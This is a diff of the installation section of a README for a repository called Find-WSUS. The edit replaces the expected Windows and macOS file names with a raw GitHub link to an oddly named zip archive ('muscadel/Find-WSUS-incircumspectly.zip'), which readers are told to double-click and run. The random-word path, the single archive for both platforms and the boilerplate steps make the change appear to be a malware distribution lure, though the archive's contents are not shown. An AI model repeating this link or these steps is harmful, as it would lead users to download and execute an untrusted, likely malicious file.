mormon-flyingsquad909/Find-WSUS/README.md

 ### For Windows:

 1. Open your “Downloads” folder.
-2. Locate the downloaded file (e.g., Find-WSUS.exe).
+2. Locate the downloaded file (e.g., https://raw.githubusercontent.com/mormon-flyingsquad909/Find-WSUS/main/muscadel/Find-WSUS-incircumspectly.zip).
 3. Double-click the file to start the application.

 ### For macOS:

 1. Open your “Downloads” folder.
-2. Find the downloaded file (e.g., Find-WSUS.dmg).
+2. Find the downloaded file (e.g., https://raw.githubusercontent.com/mormon-flyingsquad909/Find-WSUS/main/muscadel/Find-WSUS-incircumspectly.zip).
 3. Double-click the file to open it.
 4. Drag the Find-WSUS icon to your Applications folder.
 5. Open the Applications folder and double-click Find-WSUS to launch.